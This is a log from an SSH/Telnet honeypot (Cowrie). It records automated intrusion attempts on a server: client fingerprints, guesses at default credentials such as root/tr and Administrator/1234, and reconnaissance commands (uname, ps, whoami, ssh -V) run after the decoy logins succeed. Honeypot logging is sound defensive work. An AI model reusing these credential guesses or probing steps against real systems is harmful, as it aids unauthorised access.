{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T23:48:56.532401Z","src_ip":"14.103.50.32","session":"09f8d7a11988"}
{"eventid":"cowrie.command.input","input":"uname -s -m","message":"CMD: uname -s -m","sensor":"my-vps","timestamp":"2025-08-28T23:48:56.533091Z","src_ip":"14.103.50.32","session":"09f8d7a11988"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/6fa4c8ac58e7a1d947dc3250c39d1e27958f012e68061d8de0a7b70e3a65b906","size":13,"shasum":"6fa4c8ac58e7a1d947dc3250c39d1e27958f012e68061d8de0a7b70e3a65b906","duplicate":true,"duration":"2.8","message":"Closing TTY Log: var/lib/cowrie/tty/6fa4c8ac58e7a1d947dc3250c39d1e27958f012e68061d8de0a7b70e3a65b906 after 2.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:48:59.380382Z","src_ip":"14.103.50.32","session":"09f8d7a11988"}
{"eventid":"cowrie.session.closed","duration":"21.2","message":"Connection lost after 21.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:48:59.381560Z","src_ip":"14.103.50.32","session":"09f8d7a11988"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":37902,"dst_ip":"1.2.3.4","dst_port":22,"session":"a3facd72afd6","protocol":"ssh","message":"New connection: 212.227.125.160:37902 (1.2.3.4:22) [session: a3facd72afd6]","sensor":"my-vps","timestamp":"2025-08-28T23:49:21.750865Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T23:49:22.880852Z","src_ip":"212.227.125.160","session":"a3facd72afd6"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T23:49:22.881621Z","src_ip":"212.227.125.160","session":"a3facd72afd6"}
{"eventid":"cowrie.login.success","username":"root","password":"tr","message":"login attempt [root/tr] succeeded","sensor":"my-vps","timestamp":"2025-08-28T23:49:28.741486Z","src_ip":"212.227.125.160","session":"a3facd72afd6"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T23:49:31.329076Z","src_ip":"212.227.125.160","session":"a3facd72afd6"}
{"eventid":"cowrie.command.input","input":"uname -a","message":"CMD: uname -a","sensor":"my-vps","timestamp":"2025-08-28T23:49:31.329820Z","src_ip":"212.227.125.160","session":"a3facd72afd6"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","size":80,"shasum":"28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","duplicate":true,"duration":"5.7","message":"Closing TTY Log: var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15 after 5.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:49:36.991914Z","src_ip":"212.227.125.160","session":"a3facd72afd6"}
{"eventid":"cowrie.session.closed","duration":"15.3","message":"Connection lost after 15.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:49:37.014850Z","src_ip":"212.227.125.160","session":"a3facd72afd6"}
{"eventid":"cowrie.session.connect","src_ip":"201.148.180.50","src_port":34506,"dst_ip":"1.2.3.4","dst_port":22,"session":"1b8f5c72cb10","protocol":"ssh","message":"New connection: 201.148.180.50:34506 (1.2.3.4:22) [session: 1b8f5c72cb10]","sensor":"my-vps","timestamp":"2025-08-28T23:49:39.880466Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T23:49:40.874774Z","src_ip":"201.148.180.50","session":"1b8f5c72cb10"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T23:49:40.875613Z","src_ip":"201.148.180.50","session":"1b8f5c72cb10"}
{"eventid":"cowrie.login.success","username":"root","password":"tr","message":"login attempt [root/tr] succeeded","sensor":"my-vps","timestamp":"2025-08-28T23:49:47.663512Z","src_ip":"201.148.180.50","session":"1b8f5c72cb10"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T23:49:50.661543Z","src_ip":"201.148.180.50","session":"1b8f5c72cb10"}
{"eventid":"cowrie.command.input","input":"ps aux | head -10","message":"CMD: ps aux | head -10","sensor":"my-vps","timestamp":"2025-08-28T23:49:50.662309Z","src_ip":"201.148.180.50","session":"1b8f5c72cb10"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59162,"dst_ip":"1.2.3.4","dst_port":22,"session":"aabee79bbfc0","protocol":"ssh","message":"New connection: 212.227.125.160:59162 (1.2.3.4:22) [session: aabee79bbfc0]","sensor":"my-vps","timestamp":"2025-08-28T23:49:52.070294Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T23:49:52.071066Z","src_ip":"212.227.125.160","session":"aabee79bbfc0"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-28T23:49:52.121418Z","src_ip":"212.227.125.160","session":"aabee79bbfc0"}
{"eventid":"cowrie.login.failed","username":"solana","password":"solana","message":"login attempt [solana/solana] failed","sensor":"my-vps","timestamp":"2025-08-28T23:49:52.274425Z","src_ip":"212.227.125.160","session":"aabee79bbfc0"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:49:53.327027Z","src_ip":"212.227.125.160","session":"aabee79bbfc0"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e8be2a33d35f6395190677f974f883a954cc7563973bba82e50fbe1f8c81d767","size":28,"shasum":"e8be2a33d35f6395190677f974f883a954cc7563973bba82e50fbe1f8c81d767","duplicate":true,"duration":"2.7","message":"Closing TTY Log: var/lib/cowrie/tty/e8be2a33d35f6395190677f974f883a954cc7563973bba82e50fbe1f8c81d767 after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:49:53.330527Z","src_ip":"201.148.180.50","session":"1b8f5c72cb10"}
{"eventid":"cowrie.session.closed","duration":"13.5","message":"Connection lost after 13.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:49:53.332433Z","src_ip":"201.148.180.50","session":"1b8f5c72cb10"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":56910,"dst_ip":"1.2.3.4","dst_port":22,"session":"052c3c11b4be","protocol":"ssh","message":"New connection: 217.72.205.35:56910 (1.2.3.4:22) [session: 052c3c11b4be]","sensor":"my-vps","timestamp":"2025-08-28T23:50:23.622494Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:50:23.623655Z","src_ip":"217.72.205.35","session":"052c3c11b4be"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58144,"dst_ip":"1.2.3.4","dst_port":22,"session":"952a19c4e713","protocol":"ssh","message":"New connection: 212.227.125.160:58144 (1.2.3.4:22) [session: 952a19c4e713]","sensor":"my-vps","timestamp":"2025-08-28T23:51:25.098774Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T23:51:25.124421Z","src_ip":"212.227.125.160","session":"952a19c4e713"}
{"eventid":"cowrie.client.kex","hassh":"873a5fb5fedc2d4f8638ebde4abc6cfc","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha256;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-cbc,3des-cbc;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 873a5fb5fedc2d4f8638ebde4abc6cfc","sensor":"my-vps","timestamp":"2025-08-28T23:51:25.522854Z","src_ip":"212.227.125.160","session":"952a19c4e713"}
{"eventid":"cowrie.session.closed","duration":"15.1","message":"Connection lost after 15.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:51:40.172332Z","src_ip":"212.227.125.160","session":"952a19c4e713"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":20125,"dst_ip":"1.2.3.4","dst_port":22,"session":"52a31956d2d0","protocol":"ssh","message":"New connection: 212.227.125.160:20125 (1.2.3.4:22) [session: 52a31956d2d0]","sensor":"my-vps","timestamp":"2025-08-28T23:53:32.666785Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T23:53:32.668528Z","src_ip":"212.227.125.160","session":"52a31956d2d0"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T23:53:32.749063Z","src_ip":"212.227.125.160","session":"52a31956d2d0"}
{"eventid":"cowrie.login.failed","username":"Administrator","password":"1234","message":"login attempt [Administrator/1234] failed","sensor":"my-vps","timestamp":"2025-08-28T23:53:33.155728Z","src_ip":"212.227.125.160","session":"52a31956d2d0"}
{"eventid":"cowrie.login.failed","username":"Administrator","password":"abc123","message":"login attempt [Administrator/abc123] failed","sensor":"my-vps","timestamp":"2025-08-28T23:53:34.241140Z","src_ip":"212.227.125.160","session":"52a31956d2d0"}
{"eventid":"cowrie.login.failed","username":"Administrator","password":"abcd123","message":"login attempt [Administrator/abcd123] failed","sensor":"my-vps","timestamp":"2025-08-28T23:53:35.339565Z","src_ip":"212.227.125.160","session":"52a31956d2d0"}
{"eventid":"cowrie.login.failed","username":"Administrator","password":"abcd1234","message":"login attempt [Administrator/abcd1234] failed","sensor":"my-vps","timestamp":"2025-08-28T23:53:36.423434Z","src_ip":"212.227.125.160","session":"52a31956d2d0"}
{"eventid":"cowrie.login.failed","username":"Administrator","password":"abc1234","message":"login attempt [Administrator/abc1234] failed","sensor":"my-vps","timestamp":"2025-08-28T23:53:37.507076Z","src_ip":"212.227.125.160","session":"52a31956d2d0"}
{"eventid":"cowrie.session.closed","duration":"5.9","message":"Connection lost after 5.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:53:38.590138Z","src_ip":"212.227.125.160","session":"52a31956d2d0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":50438,"dst_ip":"1.2.3.4","dst_port":22,"session":"c9286c7ee796","protocol":"ssh","message":"New connection: 212.227.125.160:50438 (1.2.3.4:22) [session: c9286c7ee796]","sensor":"my-vps","timestamp":"2025-08-28T23:53:51.684048Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:53:51.685186Z","src_ip":"212.227.125.160","session":"c9286c7ee796"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":39090,"dst_ip":"1.2.3.4","dst_port":22,"session":"f86cddb7e534","protocol":"ssh","message":"New connection: 212.227.125.160:39090 (1.2.3.4:22) [session: f86cddb7e534]","sensor":"my-vps","timestamp":"2025-08-28T23:55:42.526563Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T23:55:43.607937Z","src_ip":"212.227.125.160","session":"f86cddb7e534"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T23:55:43.608687Z","src_ip":"212.227.125.160","session":"f86cddb7e534"}
{"eventid":"cowrie.login.success","username":"root","password":"?","message":"login attempt [root/?] succeeded","sensor":"my-vps","timestamp":"2025-08-28T23:55:49.360258Z","src_ip":"212.227.125.160","session":"f86cddb7e534"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T23:55:52.835023Z","src_ip":"212.227.125.160","session":"f86cddb7e534"}
{"eventid":"cowrie.command.input","input":"ssh -V","message":"CMD: ssh -V","sensor":"my-vps","timestamp":"2025-08-28T23:55:52.835736Z","src_ip":"212.227.125.160","session":"f86cddb7e534"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/8737483f9dc335904b0dacf8467784c20ab36ded9ac9b78bd025cc0566b8caff","size":58,"shasum":"8737483f9dc335904b0dacf8467784c20ab36ded9ac9b78bd025cc0566b8caff","duplicate":true,"duration":"2.3","message":"Closing TTY Log: var/lib/cowrie/tty/8737483f9dc335904b0dacf8467784c20ab36ded9ac9b78bd025cc0566b8caff after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:55:55.152922Z","src_ip":"212.227.125.160","session":"f86cddb7e534"}
{"eventid":"cowrie.session.closed","duration":"12.6","message":"Connection lost after 12.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:55:55.154103Z","src_ip":"212.227.125.160","session":"f86cddb7e534"}
{"eventid":"cowrie.session.connect","src_ip":"201.148.180.50","src_port":49480,"dst_ip":"1.2.3.4","dst_port":22,"session":"faaaa2734391","protocol":"ssh","message":"New connection: 201.148.180.50:49480 (1.2.3.4:22) [session: faaaa2734391]","sensor":"my-vps","timestamp":"2025-08-28T23:56:00.428687Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T23:56:01.594239Z","src_ip":"201.148.180.50","session":"faaaa2734391"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T23:56:01.595189Z","src_ip":"201.148.180.50","session":"faaaa2734391"}
{"eventid":"cowrie.login.success","username":"root","password":"?","message":"login attempt [root/?] succeeded","sensor":"my-vps","timestamp":"2025-08-28T23:56:07.751527Z","src_ip":"201.148.180.50","session":"faaaa2734391"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T23:56:10.578398Z","src_ip":"201.148.180.50","session":"faaaa2734391"}
{"eventid":"cowrie.command.input","input":"whoami","message":"CMD: whoami","sensor":"my-vps","timestamp":"2025-08-28T23:56:10.579093Z","src_ip":"201.148.180.50","session":"faaaa2734391"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1","size":5,"shasum":"f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1","duplicate":true,"duration":"1.6","message":"Closing TTY Log: var/lib/cowrie/tty/f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1 after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:56:12.165904Z","src_ip":"201.148.180.50","session":"faaaa2734391"}
{"eventid":"cowrie.session.closed","duration":"11.7","message":"Connection lost after 11.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:56:12.167027Z","src_ip":"201.148.180.50","session":"faaaa2734391"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60650,"dst_ip":"1.2.3.4","dst_port":23,"session":"bdc2da71c3a3","protocol":"telnet","message":"New connection: 212.227.125.160:60650 (1.2.3.4:23) [session: bdc2da71c3a3]","sensor":"my-vps","timestamp":"2025-08-28T23:56:12.272783Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":9404,"dst_ip":"1.2.3.4","dst_port":22,"session":"46914fe29c45","protocol":"ssh","message":"New connection: 212.227.235.229:9404 (1.2.3.4:22) [session: 46914fe29c45]","sensor":"my-vps","timestamp":"2025-08-28T23:56:18.782732Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:56:18.783885Z","src_ip":"212.227.235.229","session":"46914fe29c45"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":9741,"dst_ip":"1.2.3.4","dst_port":22,"session":"da57445426c3","protocol":"ssh","message":"New connection: 212.227.235.229:9741 (1.2.3.4:22) [session: da57445426c3]","sensor":"my-vps","timestamp":"2025-08-28T23:56:18.886452Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T23:56:18.887161Z","src_ip":"212.227.235.229","session":"da57445426c3"}
